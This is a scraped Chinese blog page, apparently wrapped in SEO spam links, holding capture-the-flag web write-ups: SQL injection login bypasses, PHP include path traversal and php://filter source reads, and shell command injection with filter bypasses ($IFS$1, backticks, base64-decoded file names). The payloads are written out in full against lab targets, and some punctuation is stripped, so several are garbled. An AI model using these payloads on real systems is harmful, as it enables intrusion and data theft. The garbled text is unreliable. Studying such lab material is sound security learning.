当前位置: 首页 > news >正文

高端企业门户网站建设网站的建设与规划

高端企业门户网站建设,网站的建设与规划,一个网站如何做桌面快捷链接,湖北省职业能力建设处网站关于SQL注入的一些通用办法 可以访问哪些表 如有权限#xff0c;查询当前用户可以访问的所有表 --Oracle查询当前用户可访问的所有表 select owner#xff0c; table_name from all_tables order by table_name; --MySQL查询用户可访问的所有数据库和表 select table_sche…关于SQL注入的一些通用办法 可以访问哪些表 如有权限查询当前用户可以访问的所有表 --Oracle查询当前用户可访问的所有表 select owner table_name from all_tables order by table_name; --MySQL查询用户可访问的所有数据库和表 select table_schema, table_name from information_schema.tables; --MySQL使用系统表查询所有可访问的表 select name from sysobjects where xtype U; --MSSQL使用目录视图查询可访问的表 select name from sys.tables;GET请求 GET请求在URL里发送参数的格式是 ?parameter1value1parameter2value2parameter3value3……。在浏览器导航栏中直接修改就可以操纵这些参数。 POST请求 与GET请求类似但是POST请求的参数位于请求的底部需要借助工具来查看和修改比如使用Burpsuite。 [极客大挑战 2019]EasySQL1【sql注入】 靶机启动后填写username和password登录的地址为http://url.to.target/check.php?usernameadminpasswordpassword注意post过去空格变成了加号。 http://url.to.target/ http://url.to.target/check.php? usernameadminpasswordpassword /* 动态sql select * from tab where username $username and password $password */ select * from tab where usernameadmin and passwordpass 这是最简单的SQL注入不管是在username还算在password上下功夫均可。 构造不正常的sql使or 11恒成立后面用#注释。或者让最后一个表达式or 11恒成立。得到flag为flag{4080d180-d289-43db-91ed-094ac7487e91} from urllib.parse import quote,unquote构造不正常的sql select * from tab where username or 11 # and passwordpass select * from tab where usernameadmin and password or 11for m in (\, , #, ):c quote(m)print(f{m} {c})print(quote(r or 11 #)) # username%27or1%3D1%23 print(quote(r or 11)) # password%27or%271%27%3D%271 username%27or1%3D1%23 password123 usernameadmin password%27or%271%27%3D%271 [极客大挑战 2019]Havefun1【代码审计】 页面按下F12发现提示$catdog。那么post过去一个http://url.to.target/?catdog得到flag为 flag{80a408c6-2602-472d-966b-eb09d00dc293} $catdog ?catdog [HCTF 2018]WarmUp1【php代码审计】 Web界面只看到一张大黄脸。根据“代码审计”提示按下F12可以看到提示source.php。访问source.php看到代码有新提示source.php和hint.php在白名单列表。访问hint.php看到flag not here, and flag in ffffllllaaaagggg。 http://url.to.target/ http://url.to.target/source.php http://url.to.target/hint.php 看一下source.php的代码。发现提交参数是file且file不为空、是字符串、并通过emmm:checkFile检查。这个函数经过3次检查 先检查参数是否在白名单里白名单为source.php和hint.php。如果file的值仍有参数那么取“?”前面的内容检查是否在白名单里。如果file的值仍有参数值url解码取“?”前面的内容检查是否在白名单里。 虽然“?”前的字符串在白名单里但是“?”后面的字符串可以被利用目录穿越到其他目录尝试有无 ffffllllaaaagggg 文件向上穿越4层父目录有这个文件得到flag。 ?phphighlight_file(__FILE__);class emmm{public static function checkFile($page){$whitelist [sourcesource.php,hinthint.php];if (! isset($page) || !is_string($page)) {echo you cant see it;return false;}if (in_array($page, $whitelist)) {return true;}$_page mb_substr($page,0,mb_strpos($page . ?, ?));if (in_array($_page, $whitelist)) {return true;}$_page urldecode($page);$_page mb_substr($_page,0,mb_strpos($_page . ?, ?));if (in_array($_page, $whitelist)) {return true;}echo you cant see it;return false;}}if (! empty($_REQUEST[file]) is_string($_REQUEST[file]) emmm::checkFile($_REQUEST[file])) {include $_REQUEST[file];exit;} else {echo brimg src\https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\ /;} ?构造注入的参数 ?filesource.php?/../../../../ffffllllaaaagggg。符合第二个白名单检查。 http://url.to.target/?filesource.php?/../../../../ffffllllaaaagggg  或者 ?filehint.php%253F/../../../../ffffllllaaaagggg。这里%253F被浏览器解码一次得到%3F%3F再被urldecode一次得到“?”这样就符合第三个白名单检查。 http://url.to.target/?filehint.php%253F/../../../../ffffllllaaaagggg [ACTF2020 新生赛]Include1【phpinclude漏洞】 界面有一个链接tipsGET方法传递参数file值为flag.php。题目叫Include考虑include漏洞。 http://url.to.target/ http://url.to.target/?fileflag.php PHP的Include漏洞在文件包含漏洞(include)-学习笔记_include_filter漏洞_小龙在山东的博客-CSDN博客简介服务器执行PHP文件时可以通过文件包含函数加载另一个文件中的PHP代码并且当PHP来执行这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时您只更新一个包含文件就可以了或者当您向网站添加一张新页面时仅仅需要修改一下菜单文件而不是更新所有网页中的链接。PHP Stream流属性支持受限于 allow_url_fopenNO受限于allow_url_include仅 php://input、 php://s_include_filter漏洞https://blog.csdn.net/lilongsy/article/details/108146107里面已经说的很明白了。使用读取php源代码方法/?filephp://filter/readconvert.base64-encode/resourceflag.php得到base64编码再转换为flag即可。 http://url.to.target/?filephp://filter/read/convert.base64-encode/resourceflag.php ?php echo Can you find out the flag?; //flag{a8f11f6d-a98b-4220-9cd8-f073cfc1c469} [ACTF2020 新生赛]Exec1【构造payload执行shell命令】 界面标题command execution推测是执行shell命令。F12查看提交form只有一个参数target那么执行ping的命令应该是拼接出来的动态命令。注意shell命令用“”、“”、“|”等符号分割可以在一行命令上执行多个命令。 http://url.to.flag/ $cmd ping $target # targetweibo.com;ls / $cmd ping weibo.com;ls / 尝试填入 weibo.com;ls / 看到根目录下有flag文件。再填入weibo.com;cat /flag得到flag。 ping weibo.com;ls / ping weibo.com;cat /flag [GXYCTF2019]Ping Ping Ping1【shell、$IFS$1绕开空格、绕开字母等字符】 界面上有/?ip的提示尝试构造payload/?ipqq.com;ls看到flag.php和index.php http://url.to.flag/?ipqq.com;ls 尝试构造payload查看flag.php的内容/?ipqq.com;cat flag.php看到fxck your space!看来是过滤了空格。 http://url.to.flag/?ipqq.com;cat flag.php 尝试构造payload不输入空格查看flag.php内容这里有几种方法 ${IFS} 、$IFS$1 、%20 、%09 、 、 、 等。这里$IFS$1可行payload为 /?ipqq.com;cat$IFS$1flag.php看到fxck your flag!看来是过滤了flag。 http://url.to.flag/?ipqq.com;cat$IFS$1flag.php 尝试构造payload查看index.php/?ipqq.com;cat$IFS$1index.php看到代码中过滤了斜线、反斜线、引号、括号、空格、bash、flag等一系列字符串。那么就考虑不出现这些字符串怎么访问。 http://url.to.flag/?ipqq.com;cat$IFS$1index.php 尝试构造payload/?ipqq.com;ls|xargs$IFS$1cat也就是执行 ls|xargs cat回显所有列出文件的内容再按F12看代码得到flag。 http://url.to.flag/?ipqq.com;ls|xargs$IFS$1cat 同理构造payload/?ipqq.com;cat$IFS$1ls也就是执行 cat ls回显所有列出文件的内容再按F12看代码得到flag。不同的是shell中将反引号内命令的输出作为输入执行即内联执行。 http://url.to.flag/?ipqq.com;cat$IFS$1ls 尝试构造payload/?ipqq.com;echo$IFS$1FLAG.PHP|tr$IFS$1A-Z$IFS$1a-z|xargs$IFS$1cat也就是执行 echo FLAG.PHP|tr A-Z a-z|xargs cat回显flag.php内容再按F12看代码得到flag。正则表达式只匹配了小写的flag我们就输入大写的FLAG.PHP用tr命令转为小写再执行cat。 http://url.to.flag/?ipqq.com;echo$IFS$1FLAG.PHP|tr$IFS$1A-Z$IFS$1a-z|xargs$IFS$1cat 尝试构造payload/?ipqq.com;echo$IFS$1ZmxhZy5waHA|base64$IFS$1-d|xargs$IFS$1cat也就是执行 echo ZmxhZy5waHA|base64 -d|xargs cat回显flag.php内容再按F12看代码得到flag。输入flag.php的base64编码再解码再执行cat。 http://url.to.flag/?ipqq.com;echo$IFS$1ZmxhZy5waHA|base64$IFS$1-d|xargs$IFS$1cat 尝试构造payload/?ipqq.com;xg;cat$IFS$1fla$x.php。利用正则表达式的漏洞flag的最后一个字母g可以替换也能打到目的。 http://url.to.flag/?ipqq.com;xg;cat$IFS$1fla$x.php [强网杯 2019]随便注1 既然随便注那么先尝试一下万能密码。果然可以。 --select * from tab where id $inject --/?injector11 select * from tab where idor11 http://url.to.flag/?injector11 尝试只输入一个单引号“”看报错是mysql数据库。 http://url.to.flag/?inject 尝试使用union all 联查Information.schema时候发现正则表达式过滤了select、update、delete、drop、insert、where等关键字。 http://url.to.flag/?injector11 union all select * from Information_schema.tables or11 Next http://url.to.flag/
http://www.pierceye.com/news/169800/

相关文章:

  • wordpress怎么釆集文章杭州seo百度关键词排名推广
  • 网站地址解析做好系部宣传和网站建设
  • 单页网站建设做淘宝优惠网站步骤
  • apache建立多个网站仿卢松松博客网站源码
  • 婚恋网站上海网络推广需要多少钱
  • 网站建设规划方案ppt模板wap浏览器安卓版
  • 网站关键词优化教程成都展厅设计公司
  • 百度网站排名软件怎么做网站竞价
  • 设计素材网站校园二手市场网站建设
  • 电子产品网站设计asp做微网站
  • 网站内部优化建设温州 网站制作
  • 怎么自己做网站地图网站涉及敏感视频等该怎么做
  • 个人网站建设主要功能南京自助建站网站
  • 替别人做设计的网站商业空间
  • 做网站很赚钱吗郴州网站定制
  • 霞浦建站公司建设通是个什么网站
  • 帮企业建网站网络广告有哪些
  • 网站的访问量怎么查知名电子商务网站
  • 鸣蝉小程序制作平台南通seo排名公司
  • 建设网站都要学些什么网站开发承包合同
  • 网站搭建好了怎么上到服务器好看wordpress主题
  • 免费自己制作网站教程网站文字格式
  • 模板建站教程网站建设公司特色
  • 广州网站设计制作江门住房与城乡建设局官方网站
  • 电子商城网站建设参考文献新手建立企业网站流程
  • 站长工具使用wordpress搜索框制作教程
  • 上海翼成信息科技有限公司做的什么网站怎么办一个网站
  • 上海网站建设的英文wordpress login 图标
  • 雅安市网站建设搭建网站工具
  • 网站如何做301重定向南宁一站网 给网站做营销